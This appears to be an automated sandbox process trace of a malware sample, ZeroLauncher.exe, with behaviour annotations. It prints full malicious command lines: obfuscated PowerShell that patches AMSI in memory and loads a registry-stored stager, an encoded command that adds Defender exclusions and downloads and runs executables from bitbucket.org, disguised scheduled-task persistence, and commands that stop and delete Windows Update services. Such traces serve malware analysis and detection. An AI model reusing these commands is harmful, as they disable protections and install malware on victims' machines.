$AgTlUxNSHDb.CreateType();}$IZmnijMoUivaG=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+'i'+[Char](99)+''+[Char](114)+''+[Char](111)+''+'s'+'of'+'t'+''+'.'+''+[Char](87)+''+'i'+''+[Char](110)+''+[Char](51)+''+'2'+''+'.'+'U'+[Char](110)+'saf'+'e'+'IZm'+[Char](110)+''+'i'+''+[Char](106)+''+[Char](77)+'o'+[Char](85)+'i'+[Char](118)+'a'+[Char](71)+'');$iwskdEbOljenaC=$IZmnijMoUivaG.GetMethod(''+[Char](105)+'w'+[Char](115)+''+[Char](107)+''+[Char](100)+''+'E'+''+[Char](98)+'O'+[Char](108)+''+[Char](106)+'e'+[Char](110)+''+[Char](97)+''+'C'+'',[Reflection.BindingFlags]''+'P'+'ub'+'l'+''+'i'+''+[Char](99)+''+','+''+'S'+''+[Char](116)+'a'+'t'+'i'+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$eotnTerYqLTtgULERxC=DEjSpcEYhCrn @([String])([IntPtr]);$JXwSEOtxsqCWtlnURZiOyG=DEjSpcEYhCrn @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$bLQNQPHHkyS=$IZmnijMoUivaG.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+'o'+''+'d'+''+[Char](117)+''+[Char](108)+'eH'+'a'+''+[Char](110)+''+'d'+''+'l'+'e').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+''+'n'+'e'+[Char](108)+''+'3'+'2'+'.'+'d'+[Char](108)+'l')));$VXYkOKqmLPYAXw=$iwskdEbOljenaC.Invoke($Null,@([Object]$bLQNQPHHkyS,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+'br'+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$ExcBBtwuPcHcRcPYI=$iwskdEbOljenaC.Invoke($Null,@([Object]$bLQNQPHHkyS,[Object](''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+[Char](117)+'a'+'l'+'P'+[Char](114)+'ot'+[Char](101)+'c'+[Char](116)+'')));$PQqpXrO=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VXYkOKqmLPYAXw,$eotnTerYqLTtgULERxC).Invoke('am'+[Char](115)+''+[Char](105)+''+'.'+'d'+[Char](108)+''+'l'+'');$fLWIzUiBEPqAyPTMl=$iwskdEbOljenaC.Invoke($Null,@([Object]$PQqpXrO,[Object]('A'+[Char](109)+''+[Char](115)+''+[Char](105)+''+'S'+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+'f'+''+[Char](102)+''+'e'+''+[Char](114)+'')));$eudgoLVoCH=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ExcBBtwuPcHcRcPYI,$JXwSEOtxsqCWtlnURZiOyG).Invoke($fLWIzUiBEPqAyPTMl,[uint32]8,4,[ref]$eudgoLVoCH);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$fLWIzUiBEPqAyPTMl,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ExcBBtwuPcHcRcPYI,$JXwSEOtxsqCWtlnURZiOyG).Invoke($fLWIzUiBEPqAyPTMl,[uint32]8,0x20,[ref]$eudgoLVoCH);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+[Char](84)+''+'W'+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](100)+''+'i'+''+[Char](97)+''+[Char](108)+''+'e'+'r'+'s'+''+[Char](116)+''+'a'+''+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1576 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4840
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:SnEWvpByJZeU{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$nUziyNDgUPjhhs,[Parameter(Position=1)][Type]$xiffmqtGii)$CqnRHWkbEOd=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Ref'+[Char](108)+'ec'+[Char](116)+'ed'+[Char](68)+''+'e'+''+[Char](108)+'e'+[Char](103)+'a'+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+'e'+''+[Char](109)+'o'+[Char](114)+''+'y'+'M'+[Char](111)+''+'d'+''+'u'+'le',$False).DefineType('My'+'D'+''+[Char](101)+''+'l'+''+'e'+''+'g'+''+[Char](97)+'te'+'T'+''+[Char](121)+''+[Char](112)+'e',''+'C'+''+'l'+'a'+[Char](115)+''+'s'+','+[Char](80)+''+'u'+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+'An'+[Char](115)+'i'+'C'+''+[Char](108)+'a'+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+''+[Char](116)+''+'o'+''+[Char](67)+''+'l'+''+'a'+''+[Char](115)+'s',[MulticastDelegate]);$CqnRHWkbEOd.DefineConstructor(''+'R'+''+'T'+''+[Char](83)+''+'p'+'ec'+[Char](105)+''+[Char](97)+'l'+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+'B'+'y'+''+[Char](83)+''+[Char](105)+'g'+','+'P'+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$nUziyNDgUPjhhs).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+'me'+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');$CqnRHWkbEOd.DefineMethod(''+'I'+''+'n'+''+[Char](118)+''+'o'+''+[Char](107)+'e',''+'P'+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+'i'+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+'N'+[Char](101)+''+[Char](119)+''+'S'+''+[Char](108)+''+[Char](111)+'t'+','+''+[Char](86)+''+'i'+'r'+'t'+''+[Char](117)+''+'a'+''+'l'+'',$xiffmqtGii,$nUziyNDgUPjhhs).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+',M'+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+'e'+''+'d'+'');Write-Output $CqnRHWkbEOd.CreateType();}$LVDVdnBdsrBBl=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+'m'+'.'+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType('Mi'+[Char](99)+''+[Char](114)+'o'+'s'+''+'o'+''+'f'+''+'t'+'.'+[Char](87)+'i'+'n'+''+[Char](51)+''+'2'+'.'+'U'+''+[Char](110)+'s'+[Char](97)+''+[Char](102)+''+'e'+'L'+[Char](86)+''+[Char](68)+''+[Char](86)+''+[Char](100)+'n'+[Char](66)+''+[Char](100)+''+'s'+''+'r'+''+[Char](66)+''+'B'+''+[Char](108)+'');$dLleYeKkjQudRf=$LVDVdnBdsrBBl.GetMethod(''+[Char](100)+'L'+[Char](108)+''+[Char](101)+''+[Char](89)+''+[Char](101)+''+[Char](75)+''+[Char](107)+''+[Char](106)+''+[Char](81)+'u'+[Char](100)+''+'R'+'f',[Reflection.BindingFlags]''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+','+'Sta'+'t'+'i'+'c'+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$nPYJORDEdKVOnIiujJU=SnEWvpByJZeU @([String])([IntPtr]);$gbFfwOZthlRBlIfpQtssUB=SnEWvpByJZeU @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$keXcFZEZYgB=$LVDVdnBdsrBBl.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+'M'+'od'+'u'+'le'+[Char](72)+'a'+[Char](110)+''+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+'n'+'e'+''+[Char](108)+''+[Char](51)+'2'+'.'+''+[Char](100)+''+[Char](108)+'l')));$IhsifcJqxzHruJ=$dLleYeKkjQudRf.Invoke($Null,@([Object]$keXcFZEZYgB,[Object]('L'+'o'+''+'a'+'dL'+[Char](105)+''+[Char](98)+'r'+'a'+''+[Char](114)+''+'y'+''+[Char](65)+'')));$PVeGNLbRCCimXEynl=$dLleYeKkjQudRf.Invoke($Null,@([Object]$keXcFZEZYgB,[Object](''+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+''+'l'+'Pr'+[Char](111)+''+[Char](116)+'e'+[Char](99)+'t')));$CncAbZE=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IhsifcJqxzHruJ,$nPYJORDEdKVOnIiujJU).Invoke(''+'a'+''+'m'+''+[Char](115)+'i'+'.'+''+[Char](100)+''+'l'+''+'l'+'');$CxcBdEwnoKxxBhKax=$dLleYeKkjQudRf.Invoke($Null,@([Object]$CncAbZE,[Object](''+[Char](65)+''+'m'+''+'s'+''+[Char](105)+''+'S'+''+[Char](99)+''+[Char](97)+''+'n'+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+'e'+''+[Char](114)+'')));$CMVrSxSRWM=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PVeGNLbRCCimXEynl,$gbFfwOZthlRBlIfpQtssUB).Invoke($CxcBdEwnoKxxBhKax,[uint32]8,4,[ref]$CMVrSxSRWM);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$CxcBdEwnoKxxBhKax,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PVeGNLbRCCimXEynl,$gbFfwOZthlRBlIfpQtssUB).Invoke($CxcBdEwnoKxxBhKax,[uint32]8,0x20,[ref]$CMVrSxSRWM);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+'F'+''+[Char](84)+'W'+[Char](65)+''+'R'+''+[Char](69)+'').GetValue('d'+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](114)+''+[Char](115)+'t'+'a'+''+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4552
-
-
C:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exeC:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:780
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1192
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1248
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1320
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1332
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2596
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1448
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1504
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1512
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1560
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1636
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1668
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1688
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1768
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1792
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1864
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1872
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1936
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1968
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1044
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2064
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2228
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2340
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2444
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2452
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2612
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2736
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2780
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2828
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2852
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2872
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2900
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3140
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3472
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3536
-
C:\Users\Admin\AppData\Local\Temp\ZeroLauncher.exe"C:\Users\Admin\AppData\Local\Temp\ZeroLauncher.exe"2⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2488 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcgB4ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAG4AdQBzACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATgBvACAAVgBpAHIAdAB1AGEAbAAgAE0AYQBjAGgAaQBuAGUALwBTAGUAcgB2AGUAcgAgAGkAcwAgAGEAbABsAG8AdwBlAGQAIQAgAFQAcgB5ACAAcgB1AG4AbgBpAG4AZwAgAG8AbgAgAGEAIABkAGkAZgBmAGUAcgBlAG4AdAAgAGQAZQB2AGkAYwBlACEAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAawBrACMAPgA7ACIAOwA8ACMAZQBmAHIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAHAAZwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBuAHoAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBhAHEAZAAjAD4AOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvADUAOQA0ADAAagBnADkAOAAzADQALwBnAGYAMwA0ADQAMwBmADMALwByAGEAdwAvADAAYQBkAGYAYQBlAGYANABmADgANAA3AGEAMQA3AGUAYQA0AGUANABmADYANQA2AGQAYwBkADgANQBlADcANgAyADkAMwA3ADgAMABlAGQALwBEAC4AZQB4AGUAJwAsACAAPAAjAHAAagB4ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdgBjAHkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAeQBjAHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMAZQBuAHMAZQBHAGUAdAAuAGUAeABlACcAKQApADwAIwBiAGcAawAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAGkAdABiAHUAYwBrAGUAdAAuAG8AcgBnAC8AcgBlAGMAaABlAGEAdABzAG8AcgBnAC8AcgBlAGMAaABlAGEAdABzAGQAaQByAGUAYwB0AC8AcgBhAHcALwAwADAAZQBiADIAZAAwAGIANAAzADYANQA5ADEAZgBjAGUAMQAxADUAMwBiAGEAYwBhADcANgAyADUAMAA5AGUANwA2ADIAZgAyAGMAZQA0AC8AQwBMAFAALgBlAHgAZQAnACwAIAA8ACMAcwBiAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBoAHEAdQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBrAHcAcwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBDAGgAZQBjAGsALgBlAHgAZQAnACkAKQA8ACMAawBpAHgAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAHIAZQBjAGgAZQBhAHQAcwBvAHIAZwAvAHIAZQBjAGgAZQBhAHQAcwBkAGkAcgBlAGMAdAAvAHIAYQB3AC8AMAAwAGUAYgAyAGQAMABiADQAMwA2ADUAOQAxAGYAYwBlADEAMQA1ADMAYgBhAGMAYQA3ADYAMgA1ADAAOQBlADcANgAyAGYAMgBjAGUANAAvAEQAZQB2AG0AaQBuAC4AZQB4AGUAJwAsACAAPAAjAGQAdQBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAaABoAHQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdQBzAHIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMAUwBlAG4AZAAuAGUAeABlACcAKQApADwAIwBoAHcAbgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAG0AagAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZwB1AGoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMAZQBuAHMAZQBHAGUAdAAuAGUAeABlACcAKQA8ACMAdABhAGIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAaQB1AG4AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHYAaQBlACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAEMAaABlAGMAawAuAGUAeABlACcAKQA8ACMAbgBqAHcAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAaQB4AGkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAbQBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAFMAZQBuAGQALgBlAHgAZQAnACkAPAAjAGQAbgBnACMAPgA="3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:936 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#nus#>[System.Windows.Forms.MessageBox]::Show('No Virtual Machine/Server is allowed! Try running on a different device!','','OK','Error')<#wkk#>;4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4528
-
-
C:\Users\Admin\AppData\Local\Temp\LicenseGet.exe"C:\Users\Admin\AppData\Local\Temp\LicenseGet.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1720
-
-
C:\Users\Admin\AppData\Local\Temp\LicCheck.exe"C:\Users\Admin\AppData\Local\Temp\LicCheck.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1888 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4568 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
PID:1352
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\LicSend.exe"C:\Users\Admin\AppData\Local\Temp\LicSend.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:920
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4644
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3172 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:236
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:3672
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:2588
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:4176
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1004
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:4772
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:3100
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
PID:2180
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:4768
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:4216
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of WriteProcessMemory
PID:1732 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2800
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4828
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1776
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3744
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ncotqmia#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add 